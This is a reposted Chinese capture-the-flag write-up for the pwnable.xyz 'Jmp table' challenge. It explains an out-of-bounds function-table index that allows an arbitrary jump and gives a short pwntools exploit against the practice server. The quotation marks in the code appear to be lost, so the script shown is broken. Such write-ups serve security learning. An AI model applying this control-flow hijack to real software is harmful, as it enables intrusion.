码迷,mamicode.com
首页 > 其他好文 > 详细

Pwnalbe.xyz Jmp table

时间:2020-02-10 14:00:26      阅读:66      评论:0      收藏:0      [点我收藏+]

标签:数组   执行   line   ida   e30   rac   图片   md5   lin   

题目MD5:d735b979e30f5331e4b968c1b787a36d

题目保护:

技术图片

 

 IDA分析

技术图片

 

 程序根据一个数组来跳转执行功能,而且在malloc功能中,size会写入到数组的低地址方向,这时如果我们触发数组溢界,就可以任意地址跳转

exp

from pwn import *
io=remote(svc.pwnable.xyz,30007)
io.sendline(1)
io.recvuntil(Size:)
io.sendline(4196913)
sleep(1)
io.sendline(-2)
io.interactive()

 

Pwnalbe.xyz Jmp table

标签:数组   执行   line   ida   e30   rac   图片   md5   lin   

原文地址:https://www.cnblogs.com/imbraininvat/p/12290560.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!